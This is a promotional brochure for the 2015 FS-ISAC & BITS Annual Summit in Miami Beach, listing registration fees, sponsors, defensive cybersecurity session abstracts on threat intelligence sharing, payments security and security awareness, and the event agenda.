On behalf of the FS-ISAC, BITS, and the 2015 Annual Summit Planning Committee, it is my pleasure to invite you to the 2015 FS-ISAC & BITS Annual Summit. Our sector is setting the pace for effective cybersecurity information sharing, and this summit will showcase leading thinking and practices in protecting our sector’s critical infrastructure and our individual institutions. The importance of cybersecurity is not only on the national and world stage, but is maturing as a risk discipline within our organizations. As a result, it is demanding the attention of senior leadership within our institutions, including our CEOs and boards, emphasizing the importance of what we accomplish when coming together for the summit.

You will be hearing from some of the top leaders in financial services and cybersecurity, who will share the latest on Soltra Edge and cyber intelligence, malware mitigation, and security operations, as well as real-world examples of how solutions are being effectively implemented by our members. The summit is focused on providing outstanding content and creating valuable interactions, facilitating both formal and informal information sharing, providing you a truly unique opportunity to learn, collaborate, and contribute. Additionally, this year we are pleased to introduce content tracks around cyber intelligence, awareness training, and payments, delivering an improved way to consume some of our most requested topics.

We are also fortunate to have an outstanding group of sponsors who make the summit possible. Sponsors are our partners, who have been selected based on their content contributions, and who also have their own set of experiences to share and add to best practice development in the industry along with us. I encourage you to spend time with them in the exhibit hall and at other discussion opportunities through the duration of the summit.

Please join us at the 2015 FS-ISAC & BITS Annual Summit, at Loews Miami Beach in Miami Beach, Florida, to expand your peer network, share what has worked for you as a best practice, meet our new members, and hear what CISOs and others are doing to make a positive difference in our respective organizations.

George Smirnoff IIIConference Chairman for the 2015 FS-ISAC & BITS Annual SummitCISO, Enterprise Technology and Information Risk, Comerica Bank

FS-ISAC Mission Statement

The Financial Services Information Sharing and Analysis Center (FS-ISAC), is a non-

profit association comprised of financial

institution members, that is dedicated to

protecting the global financial services

sector from physical and cyber threats that impact the resilience, integrity and stability

of member institutions through dissemination

of trusted and timely information.

Learn more at www.fsisac.com

Who Should Attend?

• CISO, CSO, CIO, CTO, or CRO

• Head of Threat Intelligence

• EVP, SVP, VP, and Director of these areas:

- Security Operations

- Fraud

- Investigations

- Physical Security

- Business Continuity

- Audit & Compliance

- Payment Risk Management

- Payment Operations

• Payment Line of Business Managers including:

- Online Banking

- Online Treasury Management

Why Should You Attend?

• Presentations by over three dozen Senior Executive FS-ISAC members

• Concrete take-aways including case studies and best practices

• Interactive sessions that allow for strategic and solution-oriented discussion

• Complimentary attendance for Premier and above members

- All meals and events during the conference are included

• Actionable information & sharing designed specifically for financial services institutions

Scott AdamsAuthor & Cartoonist

Scott Adams is the creator of the Dilbert comic strip that runs in over 2,000 newspapers worldwide, on Dilbert.com, and all over the Internet.

Adams is the author of The Dilbert Principle (#1 NYT Best Seller), Dogbert’s Top Secret Management Handbook, The Dilbert Future, Dilbert and the Way of the Weasel, The Joy of Work, God’s Debris, The Religion War, and Stick to Drawing Comics, Monkey-Brain.

Adams has failed at more things than most people have ever tried. He has been a Banker, Software Developer, Hypnotist, CEO of Scott Adams Foods, Owner of two restaurants, Inventor, TV Executive Producer, and an Internet start-up Founder. Those experiences are the backdrop for his newest book on success: How to Fail at Almost Everything and Still Win Big.

Hotel & Travel

Loews Miami Beach Hotel

1601 Collins AvenueMiami Beach, Florida, 33139Phone: (305) 604-1601

Reservations

Phone: (888) 879-0462 or (615) 340-5778www.fsisac-summit.com/spring-hotel-travel

When making your reservation, be sure to mention that you are attending the FS-ISAC and BITS Annual Summit so that you receive FS-ISAC’s discounted group rate of $249 per night. This rate is available until April 24 or once the block is full, so be sure to make your reservation early to avoid disappointment.

Airport and Transportation

Miami International Airport (MIA) - 12.8 mi from hotelFort Lauderdale Airport (FLL) - 33.4 mi from hotel

Parking

On-site overnight parking fee: $40.00 USD dailyGarage across street parking fee: $16.00 USD daily

Save 36% to 54% off the registration price!

FS-ISAC AffiliationEarly Bird

(before or on 4/17/15)Standard Registration

(after 4/17/15)

Premier/Platinum/Gold Member FREE FREE

Non-Member/CNOP Member $895 $1,750

Basic/Core Member $795 $1,500

BITS Member $795 $1,250

Standard Member $695 $1,250

Government $795 $795

Registration includes all sessions, meals and events during the conference.

Conference Registration Cancellations

Cancellations are subject to a $50 administrative fee. NO REFUNDS will be made for cancellations received after May 1, 2015. Email conferenceteam@fsisac.com for more information or to cancel.

PLEASE NOTE The FS-ISAC & BITS Annual Summit restricts attendance to actual practitioners in the financial services space. Security marketing and sales staff, consultants and recruiters cannot attend without sponsoring.

Register Online

www.fsisac-summit.com/attendee-registration2

SilverAgari, Inc.

Akamai Technologies

Arxan Technologies

BioCatch

Bit9 + Carbon Black

Contrast Security, Inc.

CrowdStrike

CyberArk

DB Networks

Easy Solutions

Flashpoint Partners

Fox-IT

Guardian Analytics

IKANOW

Lastline

Magnus Cloud LLC

NowSecure

Perspecsys

Raytheon Cyber Products

Tanium

Triumfant, Inc.

Waratek

Yubico, Inc.

ZeroFOX

Platinum

Gold

Asymmetric Threats Posed by Transnational Cybercriminal Networks Require Asymmetric Responses: How Leveraging Public/Private Partnerships Can Help Prevent, Detect, Respond and Recover from Criminally Driven Data Breaches | A joint presentation that outlines how financial services sector members can leverage public/private partnerships to help prevent, detect, respond and recover from criminally driven data breaches.

Cybersecurity Information Sharing and Risk Management | This session will feature a noteworthy and valuable discussion of Risk and Information Sharing, and will address the best practices observed in risk management as we interact with the critical infrastructure. Examples will be presented that demonstrate the risk management techniques of acceptance, avoidance, assumption, and transference. The value of information sharing will be addressed using case studies to show how information sharing is valuable to identify, understand, and address threats and vulnerabilities as part of an overall risk management strategy.

Retailers, Payment Processors, and Financial Institutions: Collaborating to Protect Sensitive Customer Data | The maturity of the retail industry will be discussed as it relates to threat intelligence and information sharing, and what best practices we can learn from the financial institutions. The session will also discuss the future of whether retailers are legally obligated to share transaction data with financial institutions, and what the role of payment processors play with the sharing of threat intelligence.

Securing Tokenized Payments | Card payment data has been stolen by criminals by compromising merchants and payment processors. An encrypted tokenized account number reduces the risk as criminals have yet to materially monetize them. The panel will review token vault technology and how tokenized account numbers are encrypted for processing and provide their views of likely points of attempted compromise of token payments processes. Panelists will discuss the data security techniques to keep the token vault and tokenized payments secure from attacks.

The Changing Cyber Threat Landscape | In this panel discussion, the speaker will provide highlights from iSIGHT Partners Annual Threat Actor Report and discuss trends, predictions and key takeaways in a lively discussion with the expert panel and audience.

Members Technical Forum

A New Way to Secure Your ATMs and Networks | Orrstown Bank’s staff has taken the lessons it has learned at JPMorgan, and is in the middle of an Enterprise Roll-out of Splunk across it’s ATM fleet and all its network devices. Listen to this community bank talk about how it is using a sophisticated set of tools to secure and protect its Enterprise Network - with specific focus on its ATMs. In this interactive demo, the bank will explain how their solution offers best in class protection, and builds the foundation for a enterprise class security/event management system.

Cyber Operation Integration with Soltra Edge | This session introduces the Cyber Security Operation implementation utilizing FS-ISAC intelligence data. Architecture and implementation details that cover Soltra Edge, Splice, and Splunk are described. Full automation from IOC ingestion to response workflow and near-real-time monitoring are highlighted. Also included are the obstacles that were overcome with the help of both Soltra Edge and Splunk teams, and the remaining issues to be aware of. Finally, some real examples of the alerts and reports are presented.

Exfiltration Framework | Data exfiltration is a common theme in most attack scenarios. The challenge in this space is sufficiently thwarting data exfiltration methods. The Exfiltration Framework is the core building block to understand what data is leaving the network and how it can be slowed down or prevented. The Exfiltration Framework is designed to delay and/or prevent economic loss and strengthen security posture. Components of this framework allow for quick implementations of techniques that can be applied to environments to protect your data. The Data Exfiltration Framework can be used to identify gaps in your network and secure data leaving the network.

Extending the STIX & TAXII Open Ecosystem | The FS-ISAC/DTCC Company - Soltra continues driving down the path of security standards innovation with the release of several “adapters” to widely used open source security tools. In this session, the end-to-end vision of automated community defense will be reviewed and it will be demonstrated how intelligence can move from the FS-ISAC to your controls with STIX & TAXII.

From Data Warehouse to Data Lake for Security Analytics and Metrics Reporting | The talk will focus on Goldman Sachs’ experience building a Hadoop environment to support security analytics over the past four years including look at the data sources and analytics that are running in the environment. The talk will also highlight the shift from using relational database technology to the Hadoop environment for metrics reporting; lessons learnt and how this approach can be applied in other organizations.

Insights from the EU: The Impact of EMV Chip on F2F Fraud and its Meaning to the U.S. | Hear how EMV chip and PCI work together and what the U.S. can learn from the rest of the world about EMV chip. Attend and learn:

• What EMV chip is and how the chip reduces fraud

• What the Council and its standards mean to EMV chip

• What guidance the Council is releasing on EMV chip and PCI DSS, skimming, terminal software security

• What the difference between tokenization is to EMV chip in comparison to PCI

• Where to go for information about how to stay secure in an EMV chip environment

Leveraging a Cybersecurity Technology Framework to Align Vendors and Assess Gaps in your Technology Portfolio | We are often inundated with vendors offering their products and services to solve our various information security problems. How can you make sense of the wide range of technologies and ensure that your control gaps are being covered? Where are opportunities for technology disruption? Where are you overly reliant on technology? This session provides a framework for understanding security technologies so that you can align vendors in the right bucket to ensure that you have the suite of technologies that you need to execute your information security mission.

Sharing is Only the Beginning | For the past two years DeutscheBank has been developing technical intelligence sharing capabilities as well as partnerships within different security communities. Sharing technical intelligence has been a strategic game changer for DeutscheBank in the way malware incident response process was implemented, supporting situational awareness and operational granularity. A continuous enrichment lifecycle has been developed for technical intelligence, not only automating some of the key phases of incident detection to remediation processes, but allowing preventive and proactive approaches. During this presentation, experience on acquiring, leveraging and sharing technical intelligence will be shared from a global finance institution point of view.

Techniques for Intelligence Management | This presentation addresses the current state of the cyber threatscape and provides recommendations for how security organization (regardless of size) can effectively & efficiently manage the gathering, storing, accessing, and sharing of threat intelligence for the proactive support of computer network defense (CND). The concept of intelligence automation will be discussed and will focus on the pros/cons of this type of effort within a security organization.

What Are You Seeing? Trends and Threats 2014 | Translating Financial Threat Data into Intelligence. This talk will provide analysis on the FS-ISAC member submissions for 2014 from the data in the FS-ISAC Intelligence Viewer.

Leadership Development Workshop

Conscious Leadership: A Two-Pronged Approach: How to Elevate your Leadership Style and Develop and Retain Women Leaders | Technical knowledge and skills are no longer enough for leaders to engage and motivate employees to achieve success. Recent studies show that self-awareness among leaders is the strongest predictor of overall success and having more women in leadership roles is correlated with stronger financial returns. Join us to learn what it means to be a Conscious Leader and how to:

• Develop and leverage conscious leadership skills to elevate your personal leadership style

• Strengthen your self-awareness, personal capacity and resilience necessary to flourish in critical roles

• Gain an understanding of how the Leadership Journey program can attract, develop and retain women leaders in your organization

* We apologize to all Affiliate Members, Affiliate Board Advisors, and Sponsors who are not permitted to attend members only and technical forum sessions

Aligning your Security Investments with Today’s Cyber Security Threats: Key Considerations and Practical Advice for a New Kind of Defense | More than 80% of today’s breaches happen at the application level yet the majority of security investments are focused on the network. Runtime Application Self-protection (RASP) is an emerging segment of the market that promises protection for production applications – without changing code. This session will host a panel that will discuss why and how enterprises will adopt this new capability - who will champion the need and how will it affect Security and IT Operations. A Forrester analyst will share some survey statistics that reveal how much risk is at stake and how you can help lead your enterprise to a stronger, more effective security program. A RASP customer will share their expectations of the technology, along with the role of people and processes to protect against ever-evolving cyber security threats. A senior HP Product Manager will share feedback from multiple customer cases: their objectives for using RASP and how they are adding this layer of defense to existing security programs.

A Multi-Pronged Approach to Battle Digital Crimes | This session will discuss the various approaches Visa’s Digital Crimes team takes to battle phishing, as well as social media abuse, rogue mobile abuse, and malware. The below areas will be discussed in greater detail:

• DMARC

• Rogue Mobile App Security

• Social Media Account Security

• Visa’s Most Wanted (a program designed to disrupt the biggest threat actors targeting Visa)

• Visa Champions (a program that focuses on bank partnerships to reduce malware and phishing attacks against their brands)

Anatomy of a Data Breach and Lessons Learned | A community bank was hacked by the “Analyzer” in 2009 and this session’s speaker was hired as CISO to clean house and remediate. This presentation will walk through the lifecycle of incident, from pre-attack, attack-in-motion, and post-attack including correction actions. This is a real-world scenario of what it means to be attacked and the steps taken during the incident management process. Attendees will learn the survival guide as the incident unfolds and all the remediation works necessary in order to return to the safety and soundness conditions.

Applying Threat Intelligence to Enhance Existing Security Controls | In this session, panelists will discuss how threat intelligence can relate to what many organizations are already doing. Renowned industry experts will present how this integration can become a valuable resource when applied with existing infrastructure through automation, in turn providing rich context to threats and better visibility without burdening security teams with complexity. Attendees will walk away from the discussion not only with a solid understanding of how threat intelligence can benefit their business but also how they can immediately make use of this information without making changes to their current environment.

A True Intelligence Network | Soltra Edge is evolving from a peer-to-peer communication appliance to a true network platform. Intelligence sharing communities will be further empowered by network services that will both simplify and increase the efficiencies of sharing intelligence. Join this presentation to learn how Soltra will once again change the industry of cyber threat intelligence.

Automated Detection of Insider and Advanced Threats Using Behavioral Security Analytics | Join the presenter, Chief Scientist at Securonix, along with CSOs from companies like Mass Mutual, ITG and others as they share how behavioral security analytics are used with existing data and infrastructure to transform security operations centers with data driven signature-less, prioritized intelligence driven operations center performing prioritized actionable rapid detection and response platform for both insider and advanced threats.

Join this session to learn how the latest in purpose built security and behavior analytics is transforming the way you can approach information security so that security teams can focus on what’s important while leveraging existing technology investments and infrastructure.

Behind the Attack: Examining Current Financial Industry Threats | Understanding the context of attacks against the financial industry is key to developing an effective defensive posture and accurate risk management schema. In this session, the speakers examine representative contemporary threats to understand how effective adversary intelligence can provide context ranging from an understanding of the attack surface, to the tools employed, motivations of the actors, marketplace interactions and consequences of the attack.

Building a Security Operations Center | Building a security operations center (SOC) that defends against cyber threats involves people, process and technology. All three pillars are necessary. Too often one or more are neglected. This presentation will cover best practices in setting up and running a security operations capability. The objective is to provide the audience with a checklist of practices to consider when deciding if a SOC is appropriate as well as deploying and maintaining one.

Case Study: Deutsche Bank, Aetna, & UBS on Third-Party Risk | Three financial institutions – Aetna, Deutsche Bank, and UBS – have determined that by working together, they can engage their software suppliers on the subject of security. In this case study and moderated discussion, leaders from these organizations will present why they chose to work together on this issue, how their joint initiative is progressing, the benefits and drawbacks of their approach, and how you can take advantage of their efforts.

Closing the Cybersecurity Gaps between Merchants and Financial Institutions | Discuss collaborations between FIs and merchants to address cybersecurity and breach issues. Share progress made by the Merchant and Financial Associations Cybersecurity Partnership, a coalition of nearly two dozen associations representing financial services companies and merchants to enhance cybersecurity and to protect consumers. As part of this, discuss how the FS-ISAC and the Retail Cyber Intelligence Sharing Center (R-CISC) worked to establish protocols for sharing information between the financial services sector and the merchant sector.

Cyber Security - The “Hard on the Outside, Soft Inside” Approach is Not Enough | Everyone has become a potential security risk, the motives of the threat actors are numerous, all organizations need to assume that they are targets and unfortunately, conventional security methods are not enough. The topics to be discussed will be:

• Big Data

• Segmentation

• Strategic Approach to Network Security/Monitoring

• Real-time – Don’t over focus on prevention – pay more attention to detection and response

• Working with other stakeholders, especially the government and your outside counsel

Cyber Threat Alliance: State of the Alliance Update | The Cyber Threat Alliance was formed by a core group of security vendors: Fortinet, McAfee, Palo Alto Networks, and Symantec. The alliance is currently building a STIX compliant framework based on the FS-ISAC model with the goal to directly share information with FS-ISAC.

In this session, one of the alliance’s founding members, Palo Alto Networks, will provide an alliance status update, review the fundamentals of threat intelligence sharing, information sharing best practices, and the future innovations and alliance roadmap. They will review how the alliance utilizes STIX, TAXII, and Cyber Observable Expression (CybOX).

Defending Against Destructive Attacks | Review the latest dimension in cyber attacks, specifically destructive attacks, and their implications for financial organizations. While some of these attacks have been very high profile (Shamoon/Saudi Aramco) and some have targeted financial organizations (DarkSeoul/Jokra), the targets have generally been overseas. With the recent attacks in the news, concern is now rising rapidly within the US as well.

Techniques for defending against these malicious attacks will be discussed, minimizing the damage they cause, and quickly recovering after the attack. Many recommendations are based on the extensive work that has been done to reverse engineer the malware used in recent attacks.

Enabling Customer Channel Innovation through Rapid Security Intelligence and Response | While static controls have their place, cyber threats to financial institutions are better solved through rapid security intelligence collection and response. In doing so, the threat activity is detected in real time and security action is rapidly initiated, matching the dynamic threat with dynamic control capability.

How to Create Collaborative Efficiencies with Third Party Risk Management in Today’s High Risk Environment | In today’s high risk environment—amidst the recent flood of high-profile data breaches and cyber security threats on the rise—doing business in an outsourced economy requires that financial institutions evaluate their service providers’ risks with vigor. Financial institutions need to ensure their service providers’ data management security controls and security practices are rigorously tested, meet regulatory compliance, and are in line with their own data security practices and standards—especially when it comes to how sensitive data is managed, accessed, and used. Attendees will learn about the successful movement toward collaborative onsite assessments by leading financial institutions.

Is Cloud Finally Ready for Wall St | Other industries have settled on Cloud, but in the highly regulated Financial Services sector, the jury is still out.  This session will address the new paradigm of self-enabled IT and look at ways financial institutions are applying existing on-premise controls to the cloud to prevent “Shadow IT” from blindsiding their security measures. The  session will provide guidance on how to report the use of cloud to the  BoD and investigate how the functionality and cost of encryption and DLP are altering the risk/reward balance of On-Prem vs. Cloud, tipping the scales to Cloud.

Maturing an Intelligence-Driven Community Defense Model | A panel of 4 security professionals ranging from cyber intelligence leader, data analytics, SOC manager, and one outside of the FI sharing community will discuss where we are today with intelligence sharing and automation of the intelligence workflow, both within FS-ISAC and broadly industry wide - what areas of the workflow lifecycle and external sharing are mature, less mature? Where do they expect to see the most improvements/opportunities in the next 6-12 months? Where can sharing communities improve in their efforts to support members?

Modern Threats Require a Modern Identity Based Architecture - Shifting the Standards in Today’s Threat Deterrence | Advanced designs are needed to counter modern day threats and attacks. It’s time to bring forward solutions which address the need for identity-based metadata architectures to create an environment of anomaly deterrence. The speakers will present a modern risk architecture and a powerful, emerging deterrence-based risk solution that others could follow. The architectures and solutions being shared are currently in play at Aetna, and is based on research through Carnegie Mellon’s CERT Insider Threat program. They will share a compelling way to shift the standards through which information security controls can be implemented and measured.

New Tactical and Strategic Challenges for the Financial CISO | Cybercriminals are upping their game, investing time and effort both in new tactical tools and in changing strategies to overcome security hurdles. In this session, the speakers will dive into several examples of how cybercriminals are changing and morphing their tactics using malware, social engineering techniques and by learning from other cybercriminals. They will also look into important changes in the technology world, geo-political landscape and different data breaches that all affect the financial CISO’s approach to securing the organization.

Preparation Through Realistic Threat Scenario Design | This interactive session will guide the audience through the creation of a realistic cyber threat scenario. The session will provide best practice guidance, tools and techniques to select a scenario, design a fictional threat actor, and add details for their exercise participants.

Expertise: BAC has a robust exercise program, designing over 20 cyber exercises each year.

Timeliness: The financial sector is under increased regulatory pressure to demonstrate preparation for cyber attacks. Cyber Exercises help demonstrate preparation.

Uniqueness: A common complaint in an exercise is the lack of realism or believability. This session provides best practice guidance to build realism.

Protecting Your Brand From Email-based Fraud | Currently, the DMARC specification is table stakes for blocking all domain-based email threats, but there has been an exponential increase in cousin-domain threats over the last few years as fraudsters become more sophisticated. An integrated, multi-layered strategy to reduce the impact of email fraud is becoming more necessary for Fin-Serv security executives. Return Path’s Rob Holmes will talk about the importance of DMARC implementation, as well as new emerging solutions- including browser blocking, anti-virus blocking, predictive data analysis, and corporate inbound filtering- that will help financial institutions combat new threats; to protect their brand and ultimately protect their customer.

Rebuilding a Security Team (Building a Great Security Operations Capability) | Many CISOs/CSO and Directors of Security Operations are facing the challenge of increased expectations, misplaced assumptions of responsibility and limited resources to deliver success. This leads to increased frustration within the security teams who are striving to protect the organizations. The speaker has been brought in multiple times to rebuild IT security organizations, turning them into respected and valued teams.

This presentation will show how the speaker has been able to change the delivery model of the IT security teams, improving morale and efficiency, while at the same time regaining the respect of other teams within the organizations.

Reverse Engineering Emails for Threat Indicators | Although enterprises receive high volumes of phishing emails daily, many still lack the ability to effectively analyze them. Performing reverse engineering allows companies to quickly answer questions about phishing emails they receive. This session will detail new reverse engineering techniques that show how to parse and pivot on metadata within an email, use custom signatures to detect malicious logic, and provide general visibility into phishing emails. Performing these techniques will provide answers to questions, such as “Have the bad guys ever used this domain against us?” that will allow organizations to proactively respond to phishing attacks.

Secure Payment Doesn’t Have to be an Oxymoron | Discuss the rapid evolution of payment form factors vs. emerging attack vectors along with expert perspectives on next generation security practices and risk mitigation. Attendees will gain up-to-the-minute awareness of issues and opportunities as well as financial services tactical best practices at the institution as well as strategic developments rolling out in the very near future from industry center-post organizations.

Securing Apple Pay Payments | Apple Pay brings new security technology to the processing of card payments. Token account numbers are stored in a mobile wallet on an Apple smart phone. The token account number is encrypted for NFC radio transmission and payment processing. Card issuers will review their authentication and enrollment processes to prevent stolen account numbers from being tokenized and then stored in the smart phone.

Security Awareness Challenge | Securing the human is critical to securing an organization. In this peer-sharing session, members share their Security Awareness material: the message, materials, posters, give-aways, games, etc.

Security Awareness - Going Above and Beyond the Traditional Approach | When you think of Security Awareness, do you think of annual training focused on the same repetitive content? Do people shuffle through training doing the minimum necessary to pass the class and get back to work?

This session focuses on a comprehensive, holistic approach to Security Awareness that includes:

• Advertising engagement methods for Information Security

• Advocating, consulting and reporting on risk mitigation and remediation

• Enabling the business to evangelize Security Best Practices

• Innovative communication to engage the user community

• Testing and measuring the impact of the awareness program

• Using metrics to shape the awareness program

• Showcasing Information Security Program Value

Security Awareness — If Only We Could Beat It into Them | Between bad guys phishing our employees and idiots circumventing idiot-proof technical controls, we all know how important security awareness is. During this presentation, the speakers discuss what makes a good security awareness program, how to overcome the silos and office politics to pool resources for increasing user awareness, and case-studies from failed and successful programs that the speaker has built for Fortune 500, global, and other organizations. They’ll also discuss ways to make security more meaningful and engaging for your end users. You’ll leave with a step-by-step plan to build or improve your security awareness program and a collection of low-cost, creative resources.

Security Executives Teaming with Board of Directors When Addressing Business Risk | As organizations increasingly rely upon technology to manage their operations and transact business, it is clear that digital and IT risk has become business risk and needs to be managed as such. Recent high profile breaches have made the situation clear to corporate boards that that this is a core responsibility. More CISOs and CIROs than ever are being called upon to discuss the current cyber threats and risks to their businesses. Join us as a panel of senior financial sector CISOs, joined by RSAs Chief Trust Officer, discusses their approaches in working with their executive leadership and corporate boards, and key elements of successfully representing the often arcane risks in an understandable business context.

Shields UP Community Banks!!! –a Cyber Defense Strategy for Community Banks | A round table discussion on the threats, vulnerabilities and attack vectors that a large population of Community Banks are exposed to and how the IT staff at the Community Banks are reacting to these threats together with their regular IT jobs. CSBS has invited a couple of InfoSec leaders from Community Banks across the nation to join us in this discussion on how they are tackling the threats today and what they are doing in protecting and defending themselves.

The New Cyber Cold War and Your Company Is the Target | Your company’s information systems are the targets. The old Cold War is over! We have - Estonia, Georgia, Stuxnet, Saudi Aramco, South Korea, U.S. Banks, Sands Corporation, and Sony. Anyone with a complaint can get into this game and cause destruction and damage. This is the new cyber conflict qualifying as a use of force but remains below that “war” threshold. How do we move forward? What laws and policies apply? What is the Administration’s “Cyber Monroe Doctrine” to let the world, and our companies, know when the U.S. will defend against cyber threats and attacks?

The Threat you Aren’t Prepared For - Hacked 3rd Party Code Libraries | Cybercriminals, hacktivists and nefarious nation-states now have a new way to target your organization through the hacking of JavaScript libraries. 2014 saw two major hacks, including the Syrian Electronic Army attacking more than 100 major websites, and jQuery suffering a breach that left its libraries vulnerable for a week. Code libraries are under attack, which means the code webmasters rely on to run their site can lead to a compromise. The speakers will review third-party code risk, share examples of breaches, and talk about how security teams can monitor for and manage the inherent risk in using these libraries.

Threat Smart | Financial institutions have been addressing information security and technology risks for decades. However, a proliferation of cyber events in recent years has revealed that the traditional approach is no longer sufficient. The executive management team should recognize its leadership role in setting the proper tone and structure for enabling cyber resiliency throughout the organization. They should also recognize the importance of mitigating cyber risks as an essential task in maintaining the on-going success of their institution.

Trust, but Verify: The Evolution of Vendor Risk Management in Financial Institutions | This presentation will first explore the evolving regulatory landscape regarding Vendor Risk Management, and the practices organizations are adopting to meet these more stringent demands. The speakers will then discuss how continuous monitoring of vendor security performance is both critical and achievable through the use of data-driven, evidence based security ratings. This session will also include a case study detailing Goldman Sach’s own industry-leading practices in VRM and how the use of performance ratings is transforming their vendor relationships.

Turning Threat Intelligence into Defensive Power | To achieve highly effective operational security, many organizations

now accept that deriving specific threat intelligence internally is a key process that needs to be managed instead of a product that can be purchased. As owning a medical book doesn’t make you a doctor, purchasing Threat Intelligence feeds doesn’t alone improve your security.

The agility of attackers’ means the time available to protect enterprises against new attack vectors is being compressed. Security teams must therefore be able to rapidly and effectively translate large volumes of threat information into intelligence to help detect threats and guard the business.

Turn Up the Heat on your Adversaries: Accelerate Targeted Attack Detection and Response | In this presentation, the speakers will chronicle the evolution of lateral movement and evasion techniques that cybercriminals are using once they are within our networks. They will explain why even in a hybrid cloud environment, cybercriminals have become extremely adept at sandbox evasion techniques. Learn to marginalize cybercriminals’ abilities to exfiltrate sensitive data and evade current controls. Understand how to stop effective man-in-browser techniques, address the uses of steganography within a network, and review the latest tactics in lateral movement. Examine how hackers are obfuscating their footprints and why threat intelligence plays an important role in protecting sensitive data.

Update on Citi’s Cyber Security Fusion Center | Since opening in Sept 2014, the Citi Cyber Security Fusion Center (CSFC) has used an intelligence led methodology to develop capabilities to increase situational awareness of cyber-threats, analyze internal data for the detection of anomalous and malicious behavior, and begin the development of cyber-crisis action plans.

The session will describe CSFC efforts and successes to date, plans for future collaborative efforts with the financial sector, and the expansion of CSFC capabilities. A discussion on how the CSFC has been able to utilize the Lockheed Martin Kill Chain in its investigative and analytic work will also be presented.

Sponsor Dine Around

Enjoy a night on the town with this year’s Summit sponsors! On Tuesday, May 19 from 7:00 - 9:00 PM, sponsors will be hosting dinners at various locations throughout Miami. RSVP’s will be requested. Dinner and transportation will be the sponsors’ treat! Keep an eye out as we get closer to the Summit for a detailed description of your dinner options.

Beach Blast

Join FS-ISAC at Miami’s premier beach destination, Nikki’s Beach, for the 2015 Annual Summit Beach Blast! Enjoy live entertainment, cocktails, dinner, sponsored cabanas with fun beach giveaways, and epic beach games. The Beach Blast will take place on Monday, May 18 from 7:00 - 9:00 PM and transportation will be provided.

Silver Solution Showcases

Join us for complimentary snacks and refreshments, and a technology showcase where the latest technical innovations in cyber-awareness, proactive security and defense will be on display. In this relaxed setting, attendees get to select up to three solutions they’d like to see. These information-packed 15 minute sessions will be presented by technology experts from our vendor sponsors, will be use-case driven and will be tailored to the unique needs of FS-ISAC members.

• Akamai Cloud Security Solutions: Protecting Banks Worldwide

• Combine the Power of DMARC with Fraud Intelligence, Achieve Full Visibility of Your Email Channel and Take a Proactive Approach to Fighting Fraud

• Detecting Malware Attacks through Behavioral Biometrics - Case Study

• Easy Solutions Unveils DSB Clientless – Lowest-friction Advanced Malware Detection Solution Available Today

• FIDO Universal 2nd Factor – the New Standard for One Touch, Secure Login to Financial Services

• Financial Services in the Cloud Age – See How Firms Are Adopting SaaS Applications While Maintaining Full Control of Regulated Financial Data

• Identify and Prevent Damage from Targeted Attacks with Next-Generation Endpoint Protection

• Illuminating the Dark Web

• Improving your Security Posture with Big Data Cyber Analytics

• Intelligent Cybersecurity Defense Layer

• It’s Time for a Security Wake-up Call: How to Re-think Security

• Leveraging Email Data in Comprehensive Threat Intelligence

• Mobile Visibility, Intelligence & Security

• New Preventive Countermeasure for DDos and Bot Threats

• Next Generation Application Security in Action with Contrast

• Privileged Threat Analytics: Identify Malicious User Behavior and Stop the Attack in its Tracks

• Rise Above the Risk of Advanced Persistent Threats

• Securing Java Apps with RASP

• Securing Mobile Banking and Payment Applications

• Stealth Security: Catching Evasive Malware in the Act

• To Trust or Not to Trust: Improving Real-time Fraud Detection Performance

• Using STIX/TAXII to Leverage Real-time Behavioral Analytics

• Why Application Whitelisting Makes Sense in Financial Services

• ZeroFOX Enterprise: Social Risk Management

Sunday, May 176:00 - 7:00 PM Opening Welcome Reception (Open to all attendees and sponsors)7:00 - 9:00 PM Sponsored Member Dinners (Closed to sponsors)

Monday, May 188:00 AM - 9:00 PM Registration

8:00 - 9:00 AM Board & Member Breakfast8:30 - 10:00 AM Board Meeting

9:00 AM - 12:00 PM Members Technical Forum12:00 - 1:00 PM Board and Members Lunch1:00 - 3:00 PM Leadership Development Workshop1:00 - 4:45 PM Members Only Meeting

5:00 - 6:00 PM Solutions Showcase (Closed to non-Silver Sponsors)6:00 - 7:00 PM Networking Reception7:00 - 9:00 PM Beach Blast9:00 - 11:00 PM After Hours Hospitality Suite

Tuesday, May 197:00 AM - 7:00 PM Registration

7:00 - 8:00 AM Breakfast8:00 - 8:15 AM Opening Remarks8:15 - 9:00 AM Keynote

9:00 - 9:45 AM General Session9:45 - 10:15 AM Networking Break10:15 - 11:15 AM Concurrent Breakouts

11:30 AM - 12:30 PM Concurrent Breakouts12:30 - 1:45 PM Birds of a Feather Lunch1:45 - 2:45 PM Concurrent Breakouts

3:00 - 4:00 PM Concurrent Breakouts4:15 - 5:15 PM Solutions Showcase (Closed to non-Silver Sponsors)

5:30 - 6:45 PM Networking Reception7:00 - 9:00 PM Sponsor Dine-Around9:00 - 11:00 PM After Hours Hospitality Suite

Wednesday, May 207:00 AM - 6:00 PM Registration

7:00 - 8:00 AM Breakfast8:00 - 8:15 AM Opening Remarks8:15 - 8:45 AM General Session8:45 - 9:15 AM General Session

9:30 - 10:30 AM Concurrent Breakouts10:30 - 11:00 AM Networking Break

11:00 AM - 12:00 PM Concurrent Breakouts12:00 - 1:00 PM Lunch1:00 - 2:00 PM Solutions Showcase (Closed to non-Silver Sponsors)

2:15 - 3:15 PM Concurrent Breakouts3:15 - 3:30 PM Closing Remarks and Conference Wrap Up

7:00 - 9:00 PM Sponsored Member Dinners*Agenda is subject to change. For an up-to-date agenda, visit www.fsisac-summit.com/spring-agenda

FIRST CLASS U.S. POSTAGE

PAIDPERMIT NO. 10SPENCER, IN

RETURN SERVICE REQUESTED

12020 Sunrise Valley Dr. Suite 230 | Reston, VA 20191

www.fsisac.com | www.fsisac-summit.com

Gold Sponsors